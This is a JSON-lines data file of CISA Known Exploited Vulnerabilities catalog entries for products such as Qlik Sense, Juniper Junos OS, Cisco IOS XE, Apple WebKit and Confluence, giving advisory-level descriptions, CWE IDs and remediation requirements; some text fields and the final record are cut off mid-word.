"CVE-2023-41266", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-41265", "text": "Qlik Sense HTTP Tunneling Vulnerability\n\nAffected: Qlik Sense\n\nQlik Sense contains an HTTP tunneling vulnerability that allows an attacker to escalate privileges and execute HTTP requests on the backend server hosting the software.\n\nRequired Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-444\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-41265", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-33107", "text": "Qualcomm Multiple Chipsets Integer Overflow Vulnerability\n\nAffected: Qualcomm Multiple Chipsets\n\nMultiple Qualcomm chipsets contain an integer overflow vulnerability due to memory corruption in Graphics Linux while assigning shared virtual memory region during IOCTL call.\n\nRequired Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.\n\nCWE(s): CWE-190\n\n[Source: CISA Known Exploited Vulnerabilities Catalo", "cve_id": "CVE-2023-33107", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-33106", "text": "Qualcomm Multiple Chipsets Use of Out-of-Range Pointer Offset Vulnerability\n\nAffected: Qualcomm Multiple Chipsets\n\nMultiple Qualcomm chipsets contain a use of out-of-range pointer offset vulnerability due to memory corruption in Graphics while submitting a large list of sync points in an AUX command to the IOCTL_KGSL_GPU_AUX_COMMAND.\n\nRequired Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.\n\nCWE(s)", "cve_id": "CVE-2023-33106", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-33063", "text": "Qualcomm Multiple Chipsets Use-After-Free Vulnerability\n\nAffected: Qualcomm Multiple Chipsets\n\nMultiple Qualcomm chipsets contain a use-after-free vulnerability due to memory corruption in DSP Services during a remote call from HLOS to DSP.\n\nRequired Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-33063", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-22071", "text": "Qualcomm Multiple Chipsets Use-After-Free Vulnerability\n\nAffected: Qualcomm Multiple Chipsets\n\nMultiple Qualcomm chipsets contain a use-after-free vulnerability when process shell memory is freed using IOCTL munmap call and process initialization is in progress.\n\nRequired Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-22071", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-42917", "text": "Apple Multiple Products WebKit Memory Corruption Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, and Safari WebKit contain a memory corruption vulnerability that leads to code execution when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply remediations or mitigations per vendor instr", "cve_id": "CVE-2023-42917", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-42916", "text": "Apple Multiple Products WebKit Out-of-Bounds Read Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, and Safari WebKit contain an out-of-bounds read vulnerability that may disclose sensitive information when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply remediations or mitigations pe", "cve_id": "CVE-2023-42916", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-6345", "text": "Google Skia Integer Overflow Vulnerability\n\nAffected: Google Chromium Skia\n\nGoogle Chromium Skia contains an integer overflow vulnerability that allows a remote attacker, who has compromised the renderer process, to potentially perform a sandbox escape via a malicious file. This vulnerability affects Google Chrome and ChromeOS, Android, Flutter, and possibly other products.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailabl", "cve_id": "CVE-2023-6345", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-49103", "text": "ownCloud graphapi Information Disclosure Vulnerability\n\nAffected: ownCloud ownCloud graphapi\n\nownCloud graphapi contains an information disclosure vulnerability that can reveal sensitive data stored in phpinfo() via GetPhpInfo.php, including administrative credentials.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-49103", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-4911", "text": "GNU C Library Buffer Overflow Vulnerability\n\nAffected: GNU GNU C Library\n\nGNU C Library's dynamic loader ld.so contains a buffer overflow vulnerability when processing the GLIBC_TUNABLES environment variable, allowing a local attacker to execute code with elevated privileges.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-122\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-4911", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-36584", "text": "Microsoft Windows Mark of the Web (MOTW) Security Feature Bypass Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Mark of the Web (MOTW) contains a security feature bypass vulnerability resulting in a limited loss of integrity and availability of security features.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-36584", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-1671", "text": "Sophos Web Appliance Command Injection Vulnerability\n\nAffected: Sophos Web Appliance\n\nSophos Web Appliance contains a command injection vulnerability in the warn-proceed handler that allows for remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-77\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-1671", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-36033", "text": "Microsoft Windows Desktop Window Manager (DWM) Core Library Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Desktop Window Manager (DWM) Core Library contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-822\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-36033", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-36025", "text": "Microsoft Windows SmartScreen Security Feature Bypass Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows SmartScreen contains a security feature bypass vulnerability that could allow an attacker to bypass Windows Defender SmartScreen checks and their associated prompts.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-36025", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-36036", "text": "Microsoft Windows Cloud Files Mini Filter Driver Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Cloud Files Mini Filter Driver contains a privilege escalation vulnerability that could allow an attacker to gain SYSTEM privileges.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-122\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-36036", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-47246", "text": "SysAid Server Path Traversal Vulnerability\n\nAffected: SysAid SysAid Server\n\nSysAid Server (on-premises version) contains a path traversal vulnerability that leads to code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-47246", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-36844", "text": "Juniper Junos OS EX Series PHP External Variable Modification Vulnerability\n\nAffected: Juniper Junos OS\n\nJuniper Junos OS on EX Series contains a PHP external variable modification vulnerability that allows an unauthenticated, network-based attacker to control certain, important environment variables. Using a crafted request an attacker is able to modify certain PHP environment variables, leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n\nRequired Action: A", "cve_id": "CVE-2023-36844", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-36845", "text": "Juniper Junos OS EX Series and SRX Series PHP External Variable Modification Vulnerability\n\nAffected: Juniper Junos OS\n\nJuniper Junos OS on EX Series and SRX Series contains a PHP external variable modification vulnerability that allows an unauthenticated, network-based attacker to control an important environment variable. Using a crafted request, which sets the variable PHPRC, an attacker is able to modify the PHP execution environment allowing the injection und execution of code.\n\nRequired Ac", "cve_id": "CVE-2023-36845", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-36846", "text": "Juniper Junos OS SRX Series Missing Authentication for Critical Function Vulnerability\n\nAffected: Juniper Junos OS\n\nJuniper Junos OS on SRX Series contains a missing authentication for critical function vulnerability that allows an unauthenticated, network-based attacker to cause limited impact to the file system integrity. With a specific request to user.php that doesn't require authentication, an attacker is able to upload arbitrary files via J-Web, leading to a loss of integrity for a certain", "cve_id": "CVE-2023-36846", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-36847", "text": "Juniper Junos OS EX Series Missing Authentication for Critical Function Vulnerability\n\nAffected: Juniper Junos OS\n\nJuniper Junos OS on EX Series contains a missing authentication for critical function vulnerability that allows an unauthenticated, network-based attacker to cause limited impact to the file system integrity. With a specific request to installAppPackage.php that doesn't require authentication, an attacker is able to upload arbitrary files via J-Web, leading to a loss of integrity fo", "cve_id": "CVE-2023-36847", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-36851", "text": "Juniper Junos OS SRX Series Missing Authentication for Critical Function Vulnerability\n\nAffected: Juniper Junos OS\n\nJuniper Junos OS on SRX Series contains a missing authentication for critical function vulnerability that allows an unauthenticated, network-based attacker to cause limited impact to the file system integrity. With a specific request to webauth_operation.php that doesn't require authentication, an attacker is able to upload arbitrary files via J-Web, leading to a loss of integrity ", "cve_id": "CVE-2023-36851", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-29552", "text": "Service Location Protocol (SLP) Denial-of-Service Vulnerability\n\nAffected: IETF Service Location Protocol (SLP)\n\nThe Service Location Protocol (SLP) contains a denial-of-service (DoS) vulnerability that could allow an unauthenticated, remote attacker to register services and use spoofed UDP traffic to conduct a denial-of-service (DoS) attack with a significant amplification factor.\n\nRequired Action: Apply mitigations per vendor instructions or disable SLP service or port 427/UDP on all systems r", "cve_id": "CVE-2023-29552", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-22518", "text": "Atlassian Confluence Data Center and Server Improper Authorization Vulnerability\n\nAffected: Atlassian Confluence Data Center and Server\n\nAtlassian Confluence Data Center and Server contain an improper authorization vulnerability that can result in significant data loss when exploited by an unauthenticated attacker. There is no impact on confidentiality since the attacker cannot exfiltrate any data.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if m", "cve_id": "CVE-2023-22518", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-46604", "text": "Apache ActiveMQ Deserialization of Untrusted Data Vulnerability\n\nAffected: Apache ActiveMQ\n\nApache ActiveMQ contains a deserialization of untrusted data vulnerability that may allow a remote attacker with network access to a broker to run shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavai", "cve_id": "CVE-2023-46604", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-46748", "text": "F5 BIG-IP Configuration Utility SQL Injection Vulnerability\n\nAffected: F5 BIG-IP Configuration Utility\n\nF5 BIG-IP Configuration utility contains an SQL injection vulnerability that may allow an authenticated attacker with network access through the BIG-IP management port and/or self IP addresses to execute system commands. This vulnerability can be used in conjunction with CVE-2023-46747.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations", "cve_id": "CVE-2023-46748", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-46747", "text": "F5 BIG-IP Configuration Utility Authentication Bypass Vulnerability\n\nAffected: F5 BIG-IP Configuration Utility\n\nF5 BIG-IP Configuration utility contains an authentication bypass using an alternate path or channel vulnerability due to undisclosed requests that may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute system commands. This vulnerability can be used in conjunction with CVE-2023-46748.\n\nRequired Act", "cve_id": "CVE-2023-46747", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-5631", "text": "Roundcube Webmail Persistent Cross-Site Scripting (XSS) Vulnerability\n\nAffected: Roundcube Webmail\n\nRoundcube Webmail contains a persistent cross-site scripting (XSS) vulnerability that allows a remote attacker to run malicious JavaScript code.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-79\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-5631", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-20273", "text": "Cisco IOS XE Web UI Command Injection Vulnerability\n\nAffected: Cisco Cisco IOS XE Web UI\n\nCisco IOS XE contains a command injection vulnerability in the web user interface. When chained with CVE-2023-20198, the attacker can leverage the new local user to elevate privilege to root and write the implant to the file system. Cisco identified CVE-2023-20273 as the vulnerability exploited to deploy the implant. CVE-2021-1435, previously associated with the exploitation events, is no longer believed to", "cve_id": "CVE-2023-20273", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-4966", "text": "Citrix NetScaler ADC and NetScaler Gateway Buffer Overflow Vulnerability\n\nAffected: Citrix NetScaler ADC and NetScaler Gateway\n\nCitrix NetScaler ADC and NetScaler Gateway contain a buffer overflow vulnerability that allows for sensitive information disclosure when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server.\n\nRequired Action: Apply mitigations and kill all active and persistent sessions per vendor instructions [https://www.netscaler.com/blog/new", "cve_id": "CVE-2023-4966", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-20198", "text": "Cisco IOS XE Web UI Privilege Escalation Vulnerability\n\nAffected: Cisco IOS XE Web UI\n\nCisco IOS XE Web UI contains a privilege escalation vulnerability in the web user interface that could allow a remote, unauthenticated attacker to create an account with privilege level 15 access. The attacker can then use that account to gain control of the affected device.\n\nRequired Action: Verify that instances of Cisco IOS XE Web UI are in compliance with BOD 23-02 and apply mitigations per vendor instruct", "cve_id": "CVE-2023-20198", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-21608", "text": "Adobe Acrobat and Reader Use-After-Free Vulnerability\n\nAffected: Adobe Acrobat and Reader\n\nAdobe Acrobat and Reader contains a use-after-free vulnerability that allows for code execution in the context of the current user.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-21608", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-20109", "text": "Cisco IOS and IOS XE Group Encrypted Transport VPN Out-of-Bounds Write Vulnerability\n\nAffected: Cisco IOS and IOS XE\n\nCisco IOS and IOS XE contain an out-of-bounds write vulnerability in the Group Encrypted Transport VPN (GET VPN) feature that could allow an authenticated, remote attacker who has administrative control of either a group member or a key server to execute malicious code or cause a device to crash.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of th", "cve_id": "CVE-2023-20109", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-41763", "text": "Microsoft Skype for Business Privilege Escalation Vulnerability\n\nAffected: Microsoft Skype for Business\n\nMicrosoft Skype for Business contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-918\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-41763", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-36563", "text": "Microsoft WordPad Information Disclosure Vulnerability\n\nAffected: Microsoft WordPad\n\nMicrosoft WordPad contains an unspecified vulnerability that allows for information disclosure.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-36563", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-44487", "text": "HTTP/2 Rapid Reset Attack Vulnerability\n\nAffected: IETF HTTP/2\n\nHTTP/2 contains a rapid reset vulnerability that allows for a distributed denial-of-service attack (DDoS).\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-400\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-44487", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-22515", "text": "Atlassian Confluence Data Center and Server Broken Access Control Vulnerability\n\nAffected: Atlassian Confluence Data Center and Server\n\nAtlassian Confluence Data Center and Server contains a broken access control vulnerability that allows an attacker to create unauthorized Confluence administrator accounts and access Confluence.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable. Check all affected Confluence instances for", "cve_id": "CVE-2023-22515", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-40044", "text": "Progress WS_FTP Server Deserialization of Untrusted Data Vulnerability\n\nAffected: Progress WS_FTP Server\n\nProgress WS_FTP Server contains a deserialization of untrusted data vulnerability in the Ad Hoc Transfer module that allows an authenticated attacker to execute remote commands on the underlying operating system.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-502\n\n[Source: CISA Know", "cve_id": "CVE-2023-40044", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-42824", "text": "Apple iOS and iPadOS Kernel Privilege Escalation Vulnerability\n\nAffected: Apple iOS and iPadOS\n\nApple iOS and iPadOS contain an unspecified vulnerability that allows for local privilege escalation.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-42824", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-42793", "text": "JetBrains TeamCity Authentication Bypass Vulnerability\n\nAffected: JetBrains TeamCity\n\nJetBrains TeamCity contains an authentication bypass vulnerability that allows for remote code execution on TeamCity Server.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-288\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-42793", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-28229", "text": "Microsoft Windows CNG Key Isolation Service Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows CNG Key Isolation Service\n\nMicrosoft Windows Cryptographic Next Generation (CNG) Key Isolation Service contains an unspecified vulnerability that allows an attacker to gain specific limited SYSTEM privileges.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-591\n\n[Source: CISA Known Exploited Vulnerabi", "cve_id": "CVE-2023-28229", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-4211", "text": "Arm Mali GPU Kernel Driver Use-After-Free Vulnerability\n\nAffected: Arm Mali GPU Kernel Driver\n\nArm Mali GPU Kernel Driver contains a use-after-free vulnerability that allows a local, non-privileged user to make improper GPU memory processing operations to gain access to already freed memory.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-4211", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-5217", "text": "Google Chromium libvpx Heap Buffer Overflow Vulnerability\n\nAffected: Google Chromium libvpx\n\nGoogle Chromium libvpx contains a heap buffer overflow vulnerability in vp8 encoding that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could impact web browsers using libvpx, including but not limited to Google Chrome.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.", "cve_id": "CVE-2023-5217", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-41991", "text": "Apple Multiple Products Improper Certificate Validation Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, and watchOS contain an improper certificate validation vulnerability that can allow a malicious app to bypass signature validation.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-295\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-41991", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-41992", "text": "Apple Multiple Products Kernel Privilege Escalation Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, and watchOS contain an unspecified vulnerability that allows for local privilege escalation.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-754\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-41992", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-41993", "text": "Apple Multiple Products WebKit Code Execution Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, and Safari WebKit contain an unspecified vulnerability that leads to code execution when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue u", "cve_id": "CVE-2023-41993", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-41179", "text": "Trend Micro Apex One and Worry-Free Business Security Remote Code Execution Vulnerability\n\nAffected: Trend Micro Apex One and Worry-Free Business Security\n\nTrend Micro Apex One and Worry-Free Business Security contain an unspecified vulnerability in the third-party anti-virus uninstaller that could allow an attacker to manipulate the module to conduct remote code execution. An attacker must first obtain administrative console access on the target system in order to exploit this vulnerability.\n\nR", "cve_id": "CVE-2023-41179", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-28434", "text": "MinIO Security Feature Bypass Vulnerability\n\nAffected: MinIO MinIO\n\nMinIO contains a security feature bypass vulnerability that allows an attacker to use crafted requests to bypass metadata bucket name checking and put an object into any bucket while processing `PostPolicyBucket` to conduct privilege escalation. To carry out this attack, the attacker requires credentials with `arn:aws:s3:::*` permission, as well as enabled Console API access.\n\nRequired Action: Apply mitigations per vendor instru", "cve_id": "CVE-2023-28434", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-22265", "text": "Samsung Mobile Devices Use-After-Free Vulnerability\n\nAffected: Samsung Mobile Devices\n\nSamsung devices with selected Exynos chipsets contain a use-after-free vulnerability that allows malicious memory write and code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-703\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-22265", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-26369", "text": "Adobe Acrobat and Reader Out-of-Bounds Write Vulnerability\n\nAffected: Adobe Acrobat and Reader\n\nAdobe Acrobat and Reader contains an out-of-bounds write vulnerability that allows for code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-26369", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-20269", "text": "Cisco Adaptive Security Appliance and Firepower Threat Defense Unauthorized Access Vulnerability\n\nAffected: Cisco Adaptive Security Appliance and Firepower Threat Defense\n\nCisco Adaptive Security Appliance and Firepower Threat Defense contain an unauthorized access vulnerability that could allow an unauthenticated, remote attacker to conduct a brute force attack in an attempt to identify valid username and password combinations or establish a clientless SSL VPN session with an unauthorized user.", "cve_id": "CVE-2023-20269", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-4863", "text": "Google Chromium WebP Heap-Based Buffer Overflow Vulnerability\n\nAffected: Google Chromium WebP\n\nGoogle Chromium WebP contains a heap-based buffer overflow vulnerability that allows a remote attacker to perform an out-of-bounds memory write via a crafted HTML page. This vulnerability can affect applications that use the WebP Codec.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Expl", "cve_id": "CVE-2023-4863", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-36761", "text": "Microsoft Word Information Disclosure Vulnerability\n\nAffected: Microsoft Word\n\nMicrosoft Word contains an unspecified vulnerability that allows for information disclosure.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-668\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-36761", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-36802", "text": "Microsoft Streaming Service Proxy Privilege Escalation Vulnerability\n\nAffected: Microsoft Streaming Service Proxy\n\nMicrosoft Streaming Service Proxy contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-36802", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-41064", "text": "Apple iOS, iPadOS, and macOS ImageIO Buffer Overflow Vulnerability\n\nAffected: Apple iOS, iPadOS, and macOS\n\nApple iOS, iPadOS, and macOS contain a buffer overflow vulnerability in ImageIO when processing a maliciously crafted image, which may lead to code execution. This vulnerability was chained with CVE-2023-41061.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-120\n\n[Source: CISA Known Exploited Vulnera", "cve_id": "CVE-2023-41064", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-41061", "text": "Apple iOS, iPadOS, and watchOS Wallet Code Execution Vulnerability\n\nAffected: Apple iOS, iPadOS, and watchOS\n\nApple iOS, iPadOS, and watchOS contain an unspecified vulnerability due to a validation issue affecting Wallet in which a maliciously crafted attachment may result in code execution. This vulnerability was chained with CVE-2023-41064.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploite", "cve_id": "CVE-2023-41061", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-33246", "text": "Apache RocketMQ Command Execution Vulnerability\n\nAffected: Apache RocketMQ\n\nSeveral components of Apache RocketMQ, including NameServer, Broker, and Controller, are exposed to the extranet and lack permission verification. An attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as or achieve the same effect by forging the RocketMQ protocol content.\n\nRequired Action: Apply mitigations per vendor instruc", "cve_id": "CVE-2023-33246", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-38831", "text": "RARLAB WinRAR Code Execution Vulnerability\n\nAffected: RARLAB WinRAR\n\nRARLAB WinRAR contains an unspecified vulnerability that allows an attacker to execute code when a user attempts to view a benign file within a ZIP archive.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-351\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-38831", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-32315", "text": "Ignite Realtime Openfire Path Traversal Vulnerability\n\nAffected: Ignite Realtime Openfire\n\nIgnite Realtime Openfire contains a path traversal vulnerability that allows an unauthenticated attacker to access restricted pages in the Openfire Admin Console reserved for administrative users.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-32315", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-38035", "text": "Ivanti Sentry Authentication Bypass Vulnerability\n\nAffected: Ivanti Sentry\n\nIvanti Sentry, formerly known as MobileIron Sentry, contains an authentication bypass vulnerability that may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-863\n\n[So", "cve_id": "CVE-2023-38035", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-27532", "text": "Veeam Backup & Replication Cloud Connect Missing Authentication for Critical Function Vulnerability\n\nAffected: Veeam Backup & Replication\n\nVeeam Backup & Replication Cloud Connect component contains a missing authentication for critical function vulnerability that allows an unauthenticated user operating within the backup infrastructure network perimeter to obtain encrypted credentials stored in the configuration database. This may lead to an attacker gaining access to the backup infrastructure ", "cve_id": "CVE-2023-27532", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-26359", "text": "Adobe ColdFusion Deserialization of Untrusted Data Vulnerability\n\nAffected: Adobe ColdFusion\n\nAdobe ColdFusion contains a deserialization of untrusted data vulnerability that could result in code execution in the context of the current user.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-502\n\n[Source: CISA Known 